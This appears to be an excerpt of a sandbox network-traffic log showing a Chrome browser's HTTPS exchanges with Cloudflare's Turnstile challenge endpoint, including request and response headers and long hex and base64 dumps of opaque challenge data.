                                                                          2024-12-08 19:50:41 UTC1369INData Raw: 79 61 58 56 2b 4e 6d 68 74 63 57 74 77 64 6e 74 76 67 49 4b 48 51 6f 6c 39 57 35 42 4e 52 69 55 38 50 54 34 2f 51 45 46 43 51 30 52 46 52 6b 65 55 67 35 68 38 58 32 64 4f 70 70 6d 66 6c 71 4b 72 59 35 57 61 6e 70 69 64 6f 36 69 63 72 61 2b 30 62 36 57 4d 6d 4b 36 7a 72 4a 74 31 56 47 74 73 62 57 35 76 63 48 46 79 63 33 52 31 64 71 65 36 79 4d 75 4f 6c 6e 33 56 79 4d 37 46 30 64 71 53 78 4d 6e 4e 78 38 7a 53 31 38 76 63 33 75 4f 65 33 74 61 66 66 70 57 57 6c 35 69 5a 6d 70 75 63 6e 5a 36 66 6f 4e 76 58 30 2f 61 32 77 4b 63 41 38 76 6a 76 2b 77 57 38 36 65 58 68 42 63 54 41 6e 36 43 33 75 4c 6d 36 75 37 79 39 76 72 2f 41 77 63 49 48 45 76 4d 57 2b 39 37 6a 79 67 73 51 46 41 34 54 47 52 34 53 46 79 6b 75 35 42 73 6d 43 43 6f 51 38 75 6e 49 33 2b 44 68 34 75
                                                                          Data Ascii: yaXV+NmhtcWtwdntvgIKHQol9W5BNRiU8PT4/QEFCQ0RFRkeUg5h8X2dOppmflqKrY5Wanpido6icra+0b6WMmK6zrJt1VGtsbW5vcHFyc3R1dqe6yMuOln3VyM7F0dqSxMnNx8zS18vc3uOe3taffpWWl5iZmpucnZ6foNvX0/a2wKcA8vjv+wW86eXhBcTAn6C3uLm6u7y9vr/AwcIHEvMW+97jygsQFA4TGR4SFyku5BsmCCoQ8unI3+Dh4u
                                                                          2024-12-08 19:50:41 UTC1369INData Raw: 61 6d 39 7a 62 58 4a 34 66 58 47 43 68 49 6c 45 57 49 4b 53 58 56 31 4d 53 53 67 2f 51 45 46 43 51 30 52 46 52 6b 64 49 53 55 70 35 66 71 53 55 63 57 5a 72 55 71 71 64 6f 35 71 6d 72 32 65 5a 6e 71 4b 63 6f 61 65 73 6f 4c 47 7a 75 48 4f 55 6d 62 2b 76 6a 49 46 34 56 32 35 76 63 48 46 79 63 33 52 31 64 6e 64 34 65 64 48 43 72 73 71 76 6c 35 71 42 32 63 7a 53 79 64 58 65 6c 73 6a 4e 30 63 76 51 31 74 76 50 34 4f 4c 6e 6f 75 7a 64 79 65 58 4b 73 71 65 47 6e 5a 36 66 6f 4b 47 69 6f 36 53 6c 70 71 65 6f 34 4e 6a 39 2f 73 54 49 72 77 6a 36 41 66 63 45 44 63 54 32 2b 77 44 35 2f 67 55 4b 2f 51 38 52 46 74 44 36 38 68 67 5a 33 74 53 7a 79 73 76 4d 7a 63 37 50 30 4e 48 53 30 39 54 56 43 42 77 52 4d 79 7a 72 39 74 30 32 4b 53 38 6d 4d 6a 76 79 4a 53 6f 75 4b 43 30
                                                                          Data Ascii: am9zbXJ4fXGChIlEWIKSXV1MSSg/QEFCQ0RFRkdISUp5fqSUcWZrUqqdo5qmr2eZnqKcoaesoLGzuHOUmb+vjIF4V25vcHFyc3R1dnd4edHCrsqvl5qB2czSydXelsjN0cvQ1tvP4OLnouzdyeXKsqeGnZ6foKGio6Slpqeo4Nj9/sTIrwj6AfcEDcT2+wD5/gUK/Q8RFtD68hgZ3tSzysvMzc7P0NHS09TVCBwRMyzr9t02KS8mMjvyJSouKC0
                                                                          2024-12-08 19:50:41 UTC1369INData Raw: 58 64 75 50 48 61 49 69 58 4f 43 66 70 4e 35 50 58 77 2f 69 34 61 62 55 59 65 4e 68 35 6c 72 6d 49 36 51 62 61 46 57 6d 4a 53 70 55 6c 68 55 6f 4a 75 77 68 4a 36 6f 5a 47 56 64 59 31 39 79 64 6e 69 67 66 30 39 6d 5a 32 68 70 61 6d 74 73 62 57 35 76 63 48 48 50 58 56 35 31 64 6e 64 34 65 58 70 37 66 48 31 2b 66 34 44 54 78 39 66 5a 31 39 53 48 79 74 33 5a 7a 4a 54 66 30 2b 4f 5a 72 48 79 54 6c 4a 57 57 6c 35 69 5a 6d 76 69 47 68 35 36 66 6f 4b 47 69 6f 36 53 6c 35 65 72 75 36 4f 33 7a 2b 4f 7a 78 42 41 6d 2f 38 39 51 48 42 67 72 4a 75 4e 61 36 77 36 61 39 76 72 2f 41 77 63 4c 44 78 4d 58 47 78 38 67 4f 47 67 38 69 47 78 51 65 4a 64 38 56 49 78 6b 76 77 4e 66 59 32 64 72 62 33 4e 33 65 33 2b 44 68 34 75 6e 71 35 53 73 33 4c 44 38 34 4d 54 74 43 2f 44 4a 41
                                                                          Data Ascii: XduPHaIiXOCfpN5PXw/i4abUYeNh5lrmI6QbaFWmJSpUlhUoJuwhJ6oZGVdY19ydnigf09mZ2hpamtsbW5vcHHPXV51dnd4eXp7fH1+f4DTx9fZ19SHyt3ZzJTf0+OZrHyTlJWWl5iZmviGh56foKGio6Sl5eru6O3z+OzxBAm/89QHBgrJuNa6w6a9vr/AwcLDxMXGx8gOGg8iGxQeJd8VIxkvwNfY2drb3N3e3+Dh4unq5Ss3LD84MTtC/DJA
                                                                          2024-12-08 19:50:41 UTC1369INData Raw: 67 35 4f 6e 2b 4c 67 4a 4f 4d 68 59 2b 57 55 59 79 4b 68 34 74 57 6a 4a 6d 59 6e 49 36 67 6c 48 53 67 6c 61 69 68 6d 71 53 72 69 4b 69 74 70 4c 43 6d 72 61 31 6f 70 62 47 6d 75 62 4b 72 74 62 78 33 72 4c 71 77 78 6e 64 37 57 6e 46 79 63 33 52 31 64 6e 64 34 65 58 70 37 66 4e 54 48 7a 63 54 51 32 5a 48 44 79 4d 7a 47 79 39 48 57 79 74 76 64 34 70 33 4b 76 39 7a 71 71 4b 50 6e 37 4e 33 72 38 38 37 68 36 65 50 69 39 50 44 30 71 36 76 34 2b 67 48 30 37 72 47 30 75 76 44 39 2f 41 48 79 42 66 6a 59 42 66 6b 4e 42 76 34 4a 45 4f 77 4e 45 67 6b 56 43 78 49 53 7a 42 30 51 46 67 30 5a 49 74 6b 4d 45 52 55 50 46 42 6f 66 45 79 51 6d 4b 2b 55 54 43 43 55 7a 38 4f 73 77 4e 53 59 30 50 42 63 71 4d 69 77 72 50 54 6b 39 38 2f 4d 79 4f 45 62 33 2b 76 76 7a 2b 76 55 6c 52
                                                                          Data Ascii: g5On+LgJOMhY+WUYyKh4tWjJmYnI6glHSglaihmqSriKitpLCmra1opbGmubKrtbx3rLqwxnd7WnFyc3R1dnd4eXp7fNTHzcTQ2ZHDyMzGy9HWytvd4p3Kv9zqqKPn7N3r887h6ePi9PD0q6v4+gH07rG0uvD9/AHyBfjYBfkNBv4JEOwNEgkVCxISzB0QFg0ZItkMERUPFBofEyQmK+UTCCUz8OswNSY0PBcqMiwrPTk98/MyOEb3+vvz+vUlR
                                                                          2024-12-08 19:50:41 UTC1369INData Raw: 56 67 5a 4e 43 69 4a 61 58 6c 5a 6c 78 6c 35 43 61 65 34 2b 59 6c 4a 4f 6c 55 6e 42 55 72 4a 2b 6c 6e 4b 69 78 61 61 36 73 74 6f 69 47 63 57 71 6f 75 71 71 30 75 33 61 37 72 36 79 2f 76 4c 78 34 69 31 74 79 63 33 52 31 64 6e 64 34 65 58 70 37 66 48 31 2b 66 34 43 42 67 6f 4f 45 68 64 33 51 31 73 33 5a 34 70 71 31 73 62 61 34 70 5a 72 59 35 75 66 6c 36 63 48 6e 34 4f 72 4c 33 2b 6a 6b 34 2f 57 75 6f 2b 66 74 36 66 73 42 74 61 71 79 41 67 43 37 39 2f 45 41 39 67 44 35 43 4c 33 41 30 36 4f 36 75 37 79 39 76 72 2f 41 77 63 4c 44 78 4d 58 47 78 38 6a 4a 4b 4e 66 4d 33 74 37 59 36 37 76 53 30 39 54 56 31 74 66 59 32 64 72 62 33 4e 30 6f 4a 75 67 35 4c 44 49 70 4e 54 37 31 50 77 38 2f 4d 51 48 37 4f 54 6f 5a 4a 53 49 45 2f 50 78 47 53 45 6c 4a 54 56 42 53 54 45
                                                                          Data Ascii: VgZNCiJaXlZlxl5Cae4+YlJOlUnBUrJ+lnKixaa6stoiGcWqouqq0u3a7r6y/vLx4i1tyc3R1dnd4eXp7fH1+f4CBgoOEhd3Q1s3Z4pq1sba4pZrY5ufl6cHn4OrL3+jk4/Wuo+ft6fsBtaqyAgC79/EA9gD5CL3A06O6u7y9vr/AwcLDxMXGx8jJKNfM3t7Y67vS09TV1tfY2drb3N0oJug5LDIpNT71Pw8/MQH7OToZJSIE/PxGSElJTVBSTE
                                                                          2024-12-08 19:50:41 UTC1369INData Raw: 56 4a 31 74 6e 59 39 66 57 70 65 59 64 34 4f 41 59 6c 74 62 70 4b 61 6e 70 36 75 75 73 4b 71 6d 73 62 4f 70 70 47 2b 6d 73 37 4f 36 73 4c 61 2b 71 37 2b 31 76 4c 78 32 65 58 70 79 7a 6c 35 31 64 6e 64 34 65 58 70 37 66 48 31 2b 66 34 43 42 67 6f 4f 45 33 4d 2f 56 7a 4e 6a 68 6d 64 2f 53 34 73 50 5a 33 74 66 69 36 65 6d 65 33 65 33 6e 33 65 2f 6c 37 4f 79 6e 71 61 48 39 6a 61 53 6c 70 71 65 6f 71 61 71 72 72 4b 32 75 72 37 43 78 73 72 4f 30 74 62 61 33 45 41 4d 4a 41 41 77 56 7a 41 67 57 34 78 6a 62 7a 4d 37 68 73 63 6a 4a 79 73 76 4d 7a 63 37 50 30 4e 48 53 30 39 54 56 31 74 63 32 35 64 72 73 37 4f 33 75 36 50 76 4c 34 75 50 6b 35 65 62 6e 36 4f 6e 71 36 2b 7a 74 54 44 55 39 52 54 68 50 33 76 58 32 39 2f 6a 35 2b 76 76 38 2f 66 34 41 41 51 49 44 42 41 56
                                                                          Data Ascii: VJ1tnY9fWpeYd4OAYltbpKanp6uusKqmsbOppG+ms7O6sLa+q7+1vLx2eXpyzl51dnd4eXp7fH1+f4CBgoOE3M/VzNjhmd/S4sPZ3tfi6eme3e3n3e/l7OynqaH9jaSlpqeoqaqrrK2ur7CxsrO0tba3EAMJAAwVzAgW4xjbzM7hscjJysvMzc7P0NHS09TV1tc25drs7O3u6PvL4uPk5ebn6Onq6+ztTDU9RThP3vX29/j5+vv8/f4AAQIDBAV
                                                                          2024-12-08 19:50:41 UTC1369INData Raw: 45 31 4f 54 31 42 52 55 71 61 72 6e 71 71 61 6f 47 47 5a 6c 70 75 59 62 35 79 64 61 6d 4b 2b 54 6d 56 6d 5a 32 68 70 61 6d 74 73 62 57 35 76 63 48 46 79 63 33 53 34 74 38 71 39 67 4e 4c 4d 77 63 4b 6f 74 4a 4f 49 6e 47 32 45 68 59 61 48 6b 4d 2f 66 32 63 2f 68 31 39 37 65 6d 5a 75 54 37 33 2b 41 67 5a 69 5a 6d 70 75 63 6e 5a 36 66 39 75 4c 30 6f 2b 66 74 38 75 72 38 41 71 72 49 72 4f 7a 78 39 65 2f 30 2b 67 44 7a 2b 41 73 51 38 2f 6a 39 41 76 73 42 42 77 77 41 42 52 63 63 30 75 7a 78 47 78 55 57 32 77 6e 6e 74 38 37 50 30 4e 48 53 30 39 54 56 4c 52 6b 72 32 66 73 68 49 79 7a 30 33 2f 33 68 4b 54 6b 7a 4b 54 73 78 4f 44 6a 79 39 4f 78 4a 32 4e 6e 77 38 66 4c 7a 39 50 58 32 39 2f 6a 35 2b 76 74 47 52 50 34 49 51 44 31 43 50 78 5a 44 52 41 67 4b 4a 79 67 4d
                                                                          Data Ascii: E1OT1BRUqarnqqaoGGZlpuYb5ydamK+TmVmZ2hpamtsbW5vcHFyc3S4t8q9gNLMwcKotJOInG2EhYaHkM/f2c/h197emZuT73+AgZiZmpucnZ6f9uL0o+ft8ur8AqrIrOzx9e/0+gDz+AsQ8/j9AvsBBwwABRcc0uzxGxUW2wnnt87P0NHS09TVLRkr2fshIyz03/3hKTkzKTsxODjy9OxJ2Nnw8fLz9PX29/j5+vtGRP4IQD1CPxZDRAgKJygM
                                                                          2024-12-08 19:50:41 UTC1369INData Raw: 6d 68 5a 31 31 78 58 33 71 69 69 35 4e 76 5a 62 78 73 72 6e 2b 75 63 71 79 72 75 34 33 42 76 72 43 36 77 4c 65 2b 76 6e 6c 35 71 70 6d 58 6e 61 4f 33 76 62 2b 39 30 63 53 39 30 63 58 50 78 73 6a 57 79 74 6a 47 30 64 66 51 32 70 4f 57 71 65 48 56 35 65 66 6c 34 70 58 6a 6e 5a 36 68 35 71 6e 44 78 38 6e 56 37 62 4f 2f 2f 71 76 6d 33 63 6a 79 75 72 48 46 39 37 76 31 39 41 58 68 38 77 62 31 41 2f 73 4d 2f 51 7a 43 43 63 72 79 37 4f 7a 68 39 4f 33 6f 36 41 58 38 37 50 62 74 2b 66 30 4d 42 66 50 78 39 2f 33 62 33 39 73 67 2b 42 6f 62 37 4f 48 31 4b 4f 73 6d 4a 54 55 53 4a 44 59 6d 4d 79 77 38 4c 6a 7a 79 4f 66 6f 6a 48 52 30 53 4a 52 34 5a 47 54 55 70 48 53 63 65 49 43 34 69 4d 44 34 33 4a 69 51 71 4d 41 35 6a 45 42 52 56 5a 31 46 68 57 31 46 6a 57 57 42 67 45
                                                                          Data Ascii: mhZ11xX3qii5NvZbxsrn+ucqyru43BvrC6wLe+vnl5qpmXnaO3vb+90cS90cXPxsjWytjG0dfQ2pOWqeHV5efl4pXjnZ6h5qnDx8nV7bO//qvm3cjyurHF97v19AXh8wb1A/sM/QzCCcry7Ozh9O3o6AX87Pbt+f0MBfPx9/3b39sg+Bob7OH1KOsmJTUSJDYmMyw8LjzyOfojHR0SJR4ZGTUpHSceIC4iMD43JiQqMA5jEBRVZ1FhW1FjWWBgE


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          22192.168.2.449775104.18.95.414431012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:50:43 UTC1171OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/608171432:1733530697:8BWsYhk1SWZlRP7GpYN7tPMosN7A_9EHlf49BfqZObo/8eef4911a8e143cb/MZci78iv2CCudpo2.FGQ5mZ5Rf0uaBDJlbj5xATahfU-1733687437-1.1.1.1-orHo8b5s0mjHvI02qYmgkSKS324gw5u9MJx4_q2_vPNFnQ_SCLfrUsZYIz4F5ypF HTTP/1.1
                                                                          Host: challenges.cloudflare.com
                                                                          Connection: keep-alive
                                                                          Content-Length: 3988
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          Content-type: application/x-www-form-urlencoded
                                                                          CF-Chl-RetryAttempt: 1
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          CF-Challenge: MZci78iv2CCudpo2.FGQ5mZ5Rf0uaBDJlbj5xATahfU-1733687437-1.1.1.1-orHo8b5s0mjHvI02qYmgkSKS324gw5u9MJx4_q2_vPNFnQ_SCLfrUsZYIz4F5ypF
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Origin: https://challenges.cloudflare.com
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/rgsuz/0x4AAAAAAADnPIDROrmt1Wwj/light/fbE/normal/auto/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-12-08 19:50:43 UTC3988OUTData Raw: 76 5f 38 65 65 66 34 39 31 31 61 38 65 31 34 33 63 62 3d 4e 64 4b 72 56 72 30 72 4a 72 61 72 31 72 7a 5a 4d 65 5a 4d 66 46 72 24 73 39 54 37 45 73 75 78 76 4d 25 32 62 79 4d 56 55 72 49 4f 4d 70 72 37 64 4d 6d 4d 44 75 79 4d 45 33 32 72 56 79 4d 50 72 45 6e 58 66 4d 77 75 72 4d 45 61 24 4d 30 35 66 4d 37 55 49 35 54 79 68 72 32 4d 6f 4e 4d 30 34 32 4f 55 6a 4b 49 50 4b 73 55 61 66 70 46 32 6c 2b 66 49 48 49 49 78 54 4d 4e 4d 4b 54 49 69 63 51 72 4d 35 48 2d 71 62 51 74 43 4c 72 6e 46 63 35 61 24 77 37 59 49 4b 4d 6d 35 6e 75 79 72 49 58 4f 47 6a 35 57 4b 4b 4b 41 6d 4f 4f 4d 49 73 4b 4d 34 72 34 36 4e 55 31 4d 4b 64 6b 4b 75 64 4d 6f 72 55 4d 58 68 73 4d 68 41 77 66 4d 4b 65 31 4d 6d 6b 5a 50 72 49 52 65 35 41 4a 50 7a 72 4d 4f 68 5a 55 58 4e 61 73 58 63
                                                                          Data Ascii: v_8eef4911a8e143cb=NdKrVr0rJrar1rzZMeZMfFr$s9T7EsuxvM%2byMVUrIOMpr7dMmMDuyME32rVyMPrEnXfMwurMEa$M05fM7UI5Tyhr2MoNM042OUjKIPKsUafpF2l+fIHIIxTMNMKTIicQrM5H-qbQtCLrnFc5a$w7YIKMm5nuyrIXOGj5WKKKAmOOMIsKM4r46NU1MKdkKudMorUMXhsMhAwfMKe1MmkZPrIRe5AJPzrMOhZUXNasXc
                                                                          2024-12-08 19:50:44 UTC714INHTTP/1.1 200 OK
                                                                          Date: Sun, 08 Dec 2024 19:50:44 GMT
                                                                          Content-Type: text/plain; charset=UTF-8
                                                                          Content-Length: 80568
                                                                          Connection: close
                                                                          cf-chl-gen: /PuUNfb9mSsSJiilfXCLdyj4PiItsIHeddafo1XtLDBoiDmXixPS0lSlCE5WY74+ljkI9i/pQAcMA7KkCtKNXtQKRByW9+JJ7lMrbiSN/5EkYmzzKHvi0ngeXDP8x+Zf83j8A8NloMocyb63C5uIQW8cp9RtWboihV8i0lIHsymp0nhhEpr1UGtrZtoKceWzMBGn6GggAtli8slA4u7bx2q+H+ITsKCPQtX8RYPtAf2WASiPEMpmYT+wD1AIo0uLKJXhf5Iktw2CBhd4YG0VQ3wK4KlecxInFKz/PeCn4oy/abpajXu4F1KaVj2JERyskgfPWwt2cGBg3Me5XxGg5mJBfH2dXQVQPMymLRjpkQO6dsWC5tYMDWky3F6mgXWdNebcjsV6clBimE3sH4BqDGa5EMOx/mjjNaIbV+C4fXmV8sqsmkwxuP6RLqGXtN7UccGzsrLgzxDHtLqk$to8xY/tGyHVk07tU
                                                                          Server: cloudflare
                                                                          CF-RAY: 8eef493d58481902-EWR
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2024-12-08 19:50:44 UTC655INData Raw: 6a 6f 47 48 66 6f 71 54 53 33 31 63 68 70 61 51 68 70 69 4f 6c 5a 56 51 55 71 57 6f 5a 30 32 6c 6d 4a 36 56 6f 61 70 69 6c 4a 46 6e 6c 58 5a 68 6e 47 4e 34 58 72 61 70 72 36 61 79 75 33 4f 6c 6f 6e 6d 6d 68 33 4b 75 64 49 6c 76 63 48 46 79 79 62 58 48 64 72 61 37 76 37 6d 2b 78 4d 6d 39 77 74 54 5a 67 71 43 45 78 74 6a 4f 33 64 62 50 32 65 44 67 79 5a 2f 4e 72 48 79 54 6c 4a 57 57 37 64 6e 72 6d 75 37 68 36 2b 4c 52 35 66 4c 33 36 50 66 35 70 73 53 6f 36 76 7a 79 41 76 72 7a 2f 51 55 46 37 63 54 78 30 4b 43 68 75 4c 6d 36 75 77 59 45 76 73 63 41 42 51 6b 44 43 41 34 54 42 77 77 65 49 39 6e 7a 2b 43 49 63 48 65 4c 53 38 50 48 79 31 75 66 68 32 54 62 46 78 74 33 65 33 2b 44 68 34 75 50 6b 4a 53 6f 75 4b 43 30 7a 4f 43 77 78 51 30 6a 77 44 2f 4a 50 33 76 58
                                                                          Data Ascii: joGHfoqTS31chpaQhpiOlZVQUqWoZ02lmJ6VoapilJFnlXZhnGN4Xrapr6ayu3Olonmmh3KudIlvcHFyybXHdra7v7m+xMm9wtTZgqCExtjO3dbP2eDgyZ/NrHyTlJWW7dnrmu7h6+LR5fL36Pf5psSo6vzyAvrz/QUF7cTx0KChuLm6uwYEvscABQkDCA4TBwweI9nz+CIcHeLS8PHy1ufh2TbFxt3e3+Dh4uPkJSouKC0zOCwxQ0jwD/JP3vX
                                                                          2024-12-08 19:50:44 UTC1369INData Raw: 79 61 58 56 2b 4e 6d 68 74 63 57 74 77 64 6e 74 76 67 49 4b 48 51 6f 6c 39 57 35 42 4e 52 69 55 38 50 54 34 2f 51 45 46 43 51 30 52 46 52 6b 65 55 67 35 68 38 58 32 64 4f 70 70 6d 66 6c 71 4b 72 59 35 57 61 6e 70 69 64 6f 36 69 63 72 61 2b 30 62 36 57 4d 6d 4b 36 7a 72 4a 74 31 56 47 74 73 62 57 35 76 63 48 46 79 63 33 52 31 64 71 65 36 79 4d 75 4f 6c 6e 33 56 79 4d 37 46 30 64 71 53 78 4d 6e 4e 78 38 7a 53 31 38 76 63 33 75 4f 65 33 74 61 66 66 70 57 57 6c 35 69 5a 6d 70 75 63 6e 5a 36 66 6f 4e 76 58 30 2f 61 32 77 4b 63 41 38 76 6a 76 2b 77 57 38 36 65 58 68 42 63 54 41 6e 36 43 33 75 4c 6d 36 75 37 79 39 76 72 2f 41 77 63 49 48 45 76 4d 57 2b 39 37 6a 79 67 73 51 46 41 34 54 47 52 34 53 46 79 6b 75 35 42 73 6d 43 43 6f 51 38 75 6e 49 33 2b 44 68 34 75
                                                                          Data Ascii: yaXV+NmhtcWtwdntvgIKHQol9W5BNRiU8PT4/QEFCQ0RFRkeUg5h8X2dOppmflqKrY5Wanpido6icra+0b6WMmK6zrJt1VGtsbW5vcHFyc3R1dqe6yMuOln3VyM7F0dqSxMnNx8zS18vc3uOe3taffpWWl5iZmpucnZ6foNvX0/a2wKcA8vjv+wW86eXhBcTAn6C3uLm6u7y9vr/AwcIHEvMW+97jygsQFA4TGR4SFyku5BsmCCoQ8unI3+Dh4u
                                                                          2024-12-08 19:50:44 UTC1369INData Raw: 61 6d 39 7a 62 58 4a 34 66 58 47 43 68 49 6c 45 57 49 4b 53 58 56 31 4d 53 53 67 2f 51 45 46 43 51 30 52 46 52 6b 64 49 53 55 70 35 66 71 53 55 63 57 5a 72 55 71 71 64 6f 35 71 6d 72 32 65 5a 6e 71 4b 63 6f 61 65 73 6f 4c 47 7a 75 48 4f 55 6d 62 2b 76 6a 49 46 34 56 32 35 76 63 48 46 79 63 33 52 31 64 6e 64 34 65 64 48 43 72 73 71 76 6c 35 71 42 32 63 7a 53 79 64 58 65 6c 73 6a 4e 30 63 76 51 31 74 76 50 34 4f 4c 6e 6f 75 7a 64 79 65 58 4b 73 71 65 47 6e 5a 36 66 6f 4b 47 69 6f 36 53 6c 70 71 65 6f 34 4e 6a 39 2f 73 54 49 72 77 6a 36 41 66 63 45 44 63 54 32 2b 77 44 35 2f 67 55 4b 2f 51 38 52 46 74 44 36 38 68 67 5a 33 74 53 7a 79 73 76 4d 7a 63 37 50 30 4e 48 53 30 39 54 56 43 42 77 52 4d 79 7a 72 39 74 30 32 4b 53 38 6d 4d 6a 76 79 4a 53 6f 75 4b 43 30
                                                                          Data Ascii: am9zbXJ4fXGChIlEWIKSXV1MSSg/QEFCQ0RFRkdISUp5fqSUcWZrUqqdo5qmr2eZnqKcoaesoLGzuHOUmb+vjIF4V25vcHFyc3R1dnd4edHCrsqvl5qB2czSydXelsjN0cvQ1tvP4OLnouzdyeXKsqeGnZ6foKGio6Slpqeo4Nj9/sTIrwj6AfcEDcT2+wD5/gUK/Q8RFtD68hgZ3tSzysvMzc7P0NHS09TVCBwRMyzr9t02KS8mMjvyJSouKC0
                                                                          2024-12-08 19:50:44 UTC1369INData Raw: 58 64 75 50 48 61 49 69 58 4f 43 66 70 4e 35 50 58 77 2f 69 34 61 62 55 59 65 4e 68 35 6c 72 6d 49 36 51 62 61 46 57 6d 4a 53 70 55 6c 68 55 6f 4a 75 77 68 4a 36 6f 5a 47 56 64 59 31 39 79 64 6e 69 67 66 30 39 6d 5a 32 68 70 61 6d 74 73 62 57 35 76 63 48 48 50 58 56 35 31 64 6e 64 34 65 58 70 37 66 48 31 2b 66 34 44 54 78 39 66 5a 31 39 53 48 79 74 33 5a 7a 4a 54 66 30 2b 4f 5a 72 48 79 54 6c 4a 57 57 6c 35 69 5a 6d 76 69 47 68 35 36 66 6f 4b 47 69 6f 36 53 6c 35 65 72 75 36 4f 33 7a 2b 4f 7a 78 42 41 6d 2f 38 39 51 48 42 67 72 4a 75 4e 61 36 77 36 61 39 76 72 2f 41 77 63 4c 44 78 4d 58 47 78 38 67 4f 47 67 38 69 47 78 51 65 4a 64 38 56 49 78 6b 76 77 4e 66 59 32 64 72 62 33 4e 33 65 33 2b 44 68 34 75 6e 71 35 53 73 33 4c 44 38 34 4d 54 74 43 2f 44 4a 41
                                                                          Data Ascii: XduPHaIiXOCfpN5PXw/i4abUYeNh5lrmI6QbaFWmJSpUlhUoJuwhJ6oZGVdY19ydnigf09mZ2hpamtsbW5vcHHPXV51dnd4eXp7fH1+f4DTx9fZ19SHyt3ZzJTf0+OZrHyTlJWWl5iZmviGh56foKGio6Sl5eru6O3z+OzxBAm/89QHBgrJuNa6w6a9vr/AwcLDxMXGx8gOGg8iGxQeJd8VIxkvwNfY2drb3N3e3+Dh4unq5Ss3LD84MTtC/DJA
                                                                          2024-12-08 19:50:44 UTC1369INData Raw: 67 35 4f 6e 2b 4c 67 4a 4f 4d 68 59 2b 57 55 59 79 4b 68 34 74 57 6a 4a 6d 59 6e 49 36 67 6c 48 53 67 6c 61 69 68 6d 71 53 72 69 4b 69 74 70 4c 43 6d 72 61 31 6f 70 62 47 6d 75 62 4b 72 74 62 78 33 72 4c 71 77 78 6e 64 37 57 6e 46 79 63 33 52 31 64 6e 64 34 65 58 70 37 66 4e 54 48 7a 63 54 51 32 5a 48 44 79 4d 7a 47 79 39 48 57 79 74 76 64 34 70 33 4b 76 39 7a 71 71 4b 50 6e 37 4e 33 72 38 38 37 68 36 65 50 69 39 50 44 30 71 36 76 34 2b 67 48 30 37 72 47 30 75 76 44 39 2f 41 48 79 42 66 6a 59 42 66 6b 4e 42 76 34 4a 45 4f 77 4e 45 67 6b 56 43 78 49 53 7a 42 30 51 46 67 30 5a 49 74 6b 4d 45 52 55 50 46 42 6f 66 45 79 51 6d 4b 2b 55 54 43 43 55 7a 38 4f 73 77 4e 53 59 30 50 42 63 71 4d 69 77 72 50 54 6b 39 38 2f 4d 79 4f 45 62 33 2b 76 76 7a 2b 76 55 6c 52
                                                                          Data Ascii: g5On+LgJOMhY+WUYyKh4tWjJmYnI6glHSglaihmqSriKitpLCmra1opbGmubKrtbx3rLqwxnd7WnFyc3R1dnd4eXp7fNTHzcTQ2ZHDyMzGy9HWytvd4p3Kv9zqqKPn7N3r887h6ePi9PD0q6v4+gH07rG0uvD9/AHyBfjYBfkNBv4JEOwNEgkVCxISzB0QFg0ZItkMERUPFBofEyQmK+UTCCUz8OswNSY0PBcqMiwrPTk98/MyOEb3+vvz+vUlR
                                                                          2024-12-08 19:50:44 UTC1369INData Raw: 56 67 5a 4e 43 69 4a 61 58 6c 5a 6c 78 6c 35 43 61 65 34 2b 59 6c 4a 4f 6c 55 6e 42 55 72 4a 2b 6c 6e 4b 69 78 61 61 36 73 74 6f 69 47 63 57 71 6f 75 71 71 30 75 33 61 37 72 36 79 2f 76 4c 78 34 69 31 74 79 63 33 52 31 64 6e 64 34 65 58 70 37 66 48 31 2b 66 34 43 42 67 6f 4f 45 68 64 33 51 31 73 33 5a 34 70 71 31 73 62 61 34 70 5a 72 59 35 75 66 6c 36 63 48 6e 34 4f 72 4c 33 2b 6a 6b 34 2f 57 75 6f 2b 66 74 36 66 73 42 74 61 71 79 41 67 43 37 39 2f 45 41 39 67 44 35 43 4c 33 41 30 36 4f 36 75 37 79 39 76 72 2f 41 77 63 4c 44 78 4d 58 47 78 38 6a 4a 4b 4e 66 4d 33 74 37 59 36 37 76 53 30 39 54 56 31 74 66 59 32 64 72 62 33 4e 30 6f 4a 75 67 35 4c 44 49 70 4e 54 37 31 50 77 38 2f 4d 51 48 37 4f 54 6f 5a 4a 53 49 45 2f 50 78 47 53 45 6c 4a 54 56 42 53 54 45
                                                                          Data Ascii: VgZNCiJaXlZlxl5Cae4+YlJOlUnBUrJ+lnKixaa6stoiGcWqouqq0u3a7r6y/vLx4i1tyc3R1dnd4eXp7fH1+f4CBgoOEhd3Q1s3Z4pq1sba4pZrY5ufl6cHn4OrL3+jk4/Wuo+ft6fsBtaqyAgC79/EA9gD5CL3A06O6u7y9vr/AwcLDxMXGx8jJKNfM3t7Y67vS09TV1tfY2drb3N0oJug5LDIpNT71Pw8/MQH7OToZJSIE/PxGSElJTVBSTE
